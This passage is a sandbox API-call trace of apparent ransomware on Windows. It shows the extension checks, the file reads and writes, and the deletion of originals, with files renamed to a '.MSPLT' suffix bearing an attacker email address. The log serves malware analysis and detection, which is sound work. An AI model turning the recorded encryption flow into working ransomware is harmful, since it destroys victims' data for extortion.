lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.124] lstrlenW (lpString=".dbf") returned 4 [0174.124] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.124] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.124] lstrlenW (lpString=".1cd") returned 4 [0174.124] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.124] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.124] lstrlenW (lpString=".jpg") returned 4 [0174.124] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.124] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.124] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.124] lstrlenW (lpString=".doc") returned 4 [0174.124] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.124] lstrlenW (lpString=".docx") returned 5 [0174.124] lstrcmpiW (lpString1=".docx", lpString2="7.ico") returned -1 [0174.124] lstrlenW (lpString=".pdf") returned 4 [0174.124] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.124] lstrlenW (lpString=".xls") returned 4 [0174.124] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.124] lstrlenW (lpString=".xlsx") returned 5 [0174.124] lstrcmpiW (lpString1=".xlsx", lpString2="7.ico") returned -1 [0174.125] lstrlenW (lpString=".ppt") returned 4 [0174.125] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.125] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.125] lstrlenW (lpString=".zip") returned 4 [0174.125] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.125] lstrlenW (lpString=".rar") returned 4 [0174.125] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.125] lstrlenW (lpString=".bz2") returned 4 [0174.125] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.125] lstrlenW (lpString=".7z") returned 3 [0174.125] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.125] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.125] lstrlenW (lpString=".dbf") returned 4 [0174.125] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.125] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.125] lstrlenW (lpString=".1cd") returned 4 [0174.125] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.125] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\Rotate7.ico") returned 42 [0174.125] lstrlenW (lpString=".jpg") returned 4 [0174.125] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.125] lstrcmpiW (lpString1=".ico", lpString2=".MSPLT") returned -1 [0174.125] lstrlenW (lpString="SysReqNotMet.ico") returned 16 [0174.125] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.126] GetFileSizeEx (in: hFile=0x374, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=1150) returned 1 [0174.126] CloseHandle (hObject=0x374) returned 1 [0174.126] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico")) returned 0x80 [0174.126] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.126] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x374 [0174.126] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.127] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.127] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0174.127] GetLastError () returned 0x0 [0174.127] ReadFile (in: hFile=0x374, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x47e, lpOverlapped=0x0) returned 1 [0174.148] WriteFile (in: hFile=0x348, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x480, lpOverlapped=0x0) returned 1 [0174.149] ReadFile (in: hFile=0x374, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0174.149] WriteFile (in: hFile=0x348, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf4, lpOverlapped=0x0) returned 1 [0174.149] SetEndOfFile (hFile=0x348) returned 1 [0174.150] CloseHandle (hObject=0x348) returned 1 [0174.152] SetFilePointerEx (in: hFile=0x374, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.152] SetEndOfFile (hFile=0x374) returned 1 [0174.153] CloseHandle (hObject=0x374) returned 1 [0174.154] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0174.154] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqnotmet.ico")) returned 1 [0174.154] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.154] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.154] lstrlenW (lpString=".doc") returned 4 [0174.154] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.155] lstrlenW (lpString=".docx") returned 5 [0174.155] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0174.155] lstrlenW (lpString=".pdf") returned 4 [0174.155] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.155] lstrlenW (lpString=".xls") returned 4 [0174.155] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.155] lstrlenW (lpString=".xlsx") returned 5 [0174.155] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0174.155] lstrlenW (lpString=".ppt") returned 4 [0174.155] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.155] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.155] lstrlenW (lpString=".zip") returned 4 [0174.155] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.155] lstrlenW (lpString=".rar") returned 4 [0174.155] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.155] lstrlenW (lpString=".bz2") returned 4 [0174.155] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.155] lstrlenW (lpString=".7z") returned 3 [0174.155] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.155] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.155] lstrlenW (lpString=".dbf") returned 4 [0174.155] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.155] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.155] lstrlenW (lpString=".1cd") returned 4 [0174.155] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.155] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.156] lstrlenW (lpString=".jpg") returned 4 [0174.156] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.156] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.156] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.156] lstrlenW (lpString=".doc") returned 4 [0174.156] lstrcmpiW (lpString1=".doc", lpString2=".ico") returned -1 [0174.156] lstrlenW (lpString=".docx") returned 5 [0174.156] lstrcmpiW (lpString1=".docx", lpString2="t.ico") returned -1 [0174.156] lstrlenW (lpString=".pdf") returned 4 [0174.156] lstrcmpiW (lpString1=".pdf", lpString2=".ico") returned 1 [0174.156] lstrlenW (lpString=".xls") returned 4 [0174.156] lstrcmpiW (lpString1=".xls", lpString2=".ico") returned 1 [0174.156] lstrlenW (lpString=".xlsx") returned 5 [0174.156] lstrcmpiW (lpString1=".xlsx", lpString2="t.ico") returned -1 [0174.156] lstrlenW (lpString=".ppt") returned 4 [0174.156] lstrcmpiW (lpString1=".ppt", lpString2=".ico") returned 1 [0174.156] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.156] lstrlenW (lpString=".zip") returned 4 [0174.156] lstrcmpiW (lpString1=".zip", lpString2=".ico") returned 1 [0174.156] lstrlenW (lpString=".rar") returned 4 [0174.156] lstrcmpiW (lpString1=".rar", lpString2=".ico") returned 1 [0174.156] lstrlenW (lpString=".bz2") returned 4 [0174.156] lstrcmpiW (lpString1=".bz2", lpString2=".ico") returned -1 [0174.156] lstrlenW (lpString=".7z") returned 3 [0174.156] lstrcmpiW (lpString1=".7z", lpString2="ico") returned -1 [0174.156] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.157] lstrlenW (lpString=".dbf") returned 4 [0174.157] lstrcmpiW (lpString1=".dbf", lpString2=".ico") returned -1 [0174.157] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.157] lstrlenW (lpString=".1cd") returned 4 [0174.157] lstrcmpiW (lpString1=".1cd", lpString2=".ico") returned -1 [0174.157] lstrlenW (lpString="C:\\588bce7c90097ed212\\Graphics\\SysReqNotMet.ico") returned 47 [0174.157] lstrlenW (lpString=".jpg") returned 4 [0174.157] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.157] lstrcmpiW (lpString1=".mzz", lpString2=".MSPLT") returned 1 [0174.157] lstrlenW (lpString="netfx_Core.mzz") returned 14 [0174.157] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0174.173] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=181483595) returned 1 [0174.173] CloseHandle (hObject=0x378) returned 1 [0174.174] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz")) returned 0x80 [0174.174] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.187] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0174.215] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_core.mzz.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x364 [0174.215] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0x0) returned 1 [0174.215] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0174.216] ReadFile (in: hFile=0x364, lpBuffer=0x3b47058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x3b47058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0174.226] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x39b12c3, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0174.226] ReadFile (in: hFile=0x364, lpBuffer=0x3b87058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x3b87058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0174.238] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x355fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.238] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0xacd384b, lpNewFilePointer=0x0, dwMoveMethod=0x355fc24 | out: lpNewFilePointer=0x0) returned 1 [0174.238] ReadFile (in: hFile=0x364, lpBuffer=0x3bc7058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x355fc30, lpOverlapped=0x0 | out: lpBuffer=0x3bc7058*, lpNumberOfBytesRead=0x355fc30*=0x40000, lpOverlapped=0x0) returned 1 [0174.266] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.266] WriteFile (in: hFile=0x364, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x355fca8, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fca8*=0xc0108, lpOverlapped=0x0) returned 1 [0174.675] SetEndOfFile (hFile=0x364) returned 1 [0174.675] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40000) returned 0x3fb82b0 [0174.681] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0174.681] WriteFile (in: hFile=0x364, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0174.682] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x39b12c3, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0174.682] WriteFile (in: hFile=0x364, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0174.684] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0xacd384b, lpNewFilePointer=0x0, dwMoveMethod=0x355fc74 | out: lpNewFilePointer=0x0) returned 1 [0174.684] WriteFile (in: hFile=0x364, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x355fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x355fc80*=0x40000, lpOverlapped=0x0) returned 1 [0174.686] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3fb82b0 | out: hHeap=0x710000) returned 1 [0174.686] CloseHandle (hObject=0x364) returned 1 [0181.537] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Core.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0181.538] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.538] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.539] lstrlenW (lpString=".doc") returned 4 [0181.539] lstrcmpiW (lpString1=".doc", lpString2=".mzz") returned -1 [0181.539] lstrlenW (lpString=".docx") returned 5 [0181.539] lstrcmpiW (lpString1=".docx", lpString2="e.mzz") returned -1 [0181.539] lstrlenW (lpString=".pdf") returned 4 [0181.539] lstrcmpiW (lpString1=".pdf", lpString2=".mzz") returned 1 [0181.539] lstrlenW (lpString=".xls") returned 4 [0181.539] lstrcmpiW (lpString1=".xls", lpString2=".mzz") returned 1 [0181.539] lstrlenW (lpString=".xlsx") returned 5 [0181.539] lstrcmpiW (lpString1=".xlsx", lpString2="e.mzz") returned -1 [0181.539] lstrlenW (lpString=".ppt") returned 4 [0181.539] lstrcmpiW (lpString1=".ppt", lpString2=".mzz") returned 1 [0181.539] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.539] lstrlenW (lpString=".zip") returned 4 [0181.539] lstrcmpiW (lpString1=".zip", lpString2=".mzz") returned 1 [0181.539] lstrlenW (lpString=".rar") returned 4 [0181.539] lstrcmpiW (lpString1=".rar", lpString2=".mzz") returned 1 [0181.539] lstrlenW (lpString=".bz2") returned 4 [0181.539] lstrcmpiW (lpString1=".bz2", lpString2=".mzz") returned -1 [0181.539] lstrlenW (lpString=".7z") returned 3 [0181.539] lstrcmpiW (lpString1=".7z", lpString2="mzz") returned -1 [0181.539] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.539] lstrlenW (lpString=".dbf") returned 4 [0181.539] lstrcmpiW (lpString1=".dbf", lpString2=".mzz") returned -1 [0181.539] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.539] lstrlenW (lpString=".1cd") returned 4 [0181.539] lstrcmpiW (lpString1=".1cd", lpString2=".mzz") returned -1 [0181.539] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.540] lstrlenW (lpString=".jpg") returned 4 [0181.540] lstrcmpiW (lpString1=".jpg", lpString2=".mzz") returned -1 [0181.540] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.540] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.540] lstrlenW (lpString=".doc") returned 4 [0181.540] lstrcmpiW (lpString1=".doc", lpString2=".mzz") returned -1 [0181.540] lstrlenW (lpString=".docx") returned 5 [0181.540] lstrcmpiW (lpString1=".docx", lpString2="e.mzz") returned -1 [0181.540] lstrlenW (lpString=".pdf") returned 4 [0181.540] lstrcmpiW (lpString1=".pdf", lpString2=".mzz") returned 1 [0181.540] lstrlenW (lpString=".xls") returned 4 [0181.540] lstrcmpiW (lpString1=".xls", lpString2=".mzz") returned 1 [0181.540] lstrlenW (lpString=".xlsx") returned 5 [0181.540] lstrcmpiW (lpString1=".xlsx", lpString2="e.mzz") returned -1 [0181.540] lstrlenW (lpString=".ppt") returned 4 [0181.540] lstrcmpiW (lpString1=".ppt", lpString2=".mzz") returned 1 [0181.540] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.540] lstrlenW (lpString=".zip") returned 4 [0181.540] lstrcmpiW (lpString1=".zip", lpString2=".mzz") returned 1 [0181.540] lstrlenW (lpString=".rar") returned 4 [0181.540] lstrcmpiW (lpString1=".rar", lpString2=".mzz") returned 1 [0181.540] lstrlenW (lpString=".bz2") returned 4 [0181.540] lstrcmpiW (lpString1=".bz2", lpString2=".mzz") returned -1 [0181.540] lstrlenW (lpString=".7z") returned 3 [0181.540] lstrcmpiW (lpString1=".7z", lpString2="mzz") returned -1 [0181.540] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.540] lstrlenW (lpString=".dbf") returned 4 [0181.540] lstrcmpiW (lpString1=".dbf", lpString2=".mzz") returned -1 [0181.540] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.540] lstrlenW (lpString=".1cd") returned 4 [0181.541] lstrcmpiW (lpString1=".1cd", lpString2=".mzz") returned -1 [0181.541] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Core.mzz") returned 36 [0181.541] lstrlenW (lpString=".jpg") returned 4 [0181.541] lstrcmpiW (lpString1=".jpg", lpString2=".mzz") returned -1 [0181.541] lstrcmpiW (lpString1=".exe", lpString2=".MSPLT") returned -1 [0181.541] lstrlenW (lpString="SetupUtility.exe") returned 16 [0181.541] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0181.541] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=96088) returned 1 [0181.541] CloseHandle (hObject=0x388) returned 1 [0181.541] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe")) returned 0x80 [0181.542] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0181.542] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0181.542] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.542] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.542] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0181.542] GetLastError () returned 0x0 [0181.542] ReadFile (in: hFile=0x388, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x17758, lpOverlapped=0x0) returned 1 [0181.617] WriteFile (in: hFile=0x350, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x17760, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x17760, lpOverlapped=0x0) returned 1 [0181.620] ReadFile (in: hFile=0x388, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.620] WriteFile (in: hFile=0x350, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf4, lpOverlapped=0x0) returned 1 [0181.621] SetEndOfFile (hFile=0x350) returned 1 [0181.621] CloseHandle (hObject=0x350) returned 1 [0181.628] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.628] SetEndOfFile (hFile=0x388) returned 1 [0181.630] CloseHandle (hObject=0x388) returned 1 [0181.630] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0181.631] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\SetupUtility.exe" (normalized: "c:\\588bce7c90097ed212\\setuputility.exe")) returned 1 [0181.631] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.631] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.631] lstrlenW (lpString=".doc") returned 4 [0181.631] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0181.631] lstrlenW (lpString=".docx") returned 5 [0181.631] lstrcmpiW (lpString1=".docx", lpString2="y.exe") returned -1 [0181.631] lstrlenW (lpString=".pdf") returned 4 [0181.631] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0181.631] lstrlenW (lpString=".xls") returned 4 [0181.631] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0181.631] lstrlenW (lpString=".xlsx") returned 5 [0181.632] lstrcmpiW (lpString1=".xlsx", lpString2="y.exe") returned -1 [0181.632] lstrlenW (lpString=".ppt") returned 4 [0181.632] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0181.632] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.632] lstrlenW (lpString=".zip") returned 4 [0181.632] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0181.632] lstrlenW (lpString=".rar") returned 4 [0181.632] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0181.632] lstrlenW (lpString=".bz2") returned 4 [0181.632] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0181.632] lstrlenW (lpString=".7z") returned 3 [0181.632] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0181.632] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.632] lstrlenW (lpString=".dbf") returned 4 [0181.632] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0181.632] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.632] lstrlenW (lpString=".1cd") returned 4 [0181.632] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0181.632] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.632] lstrlenW (lpString=".jpg") returned 4 [0181.632] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0181.632] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.632] lstrlenW (lpString="C:\\588bce7c90097ed212\\SetupUtility.exe") returned 38 [0181.632] lstrlenW (lpString=".doc") returned 4 [0181.632] lstrcmpiW (lpString1=".doc", 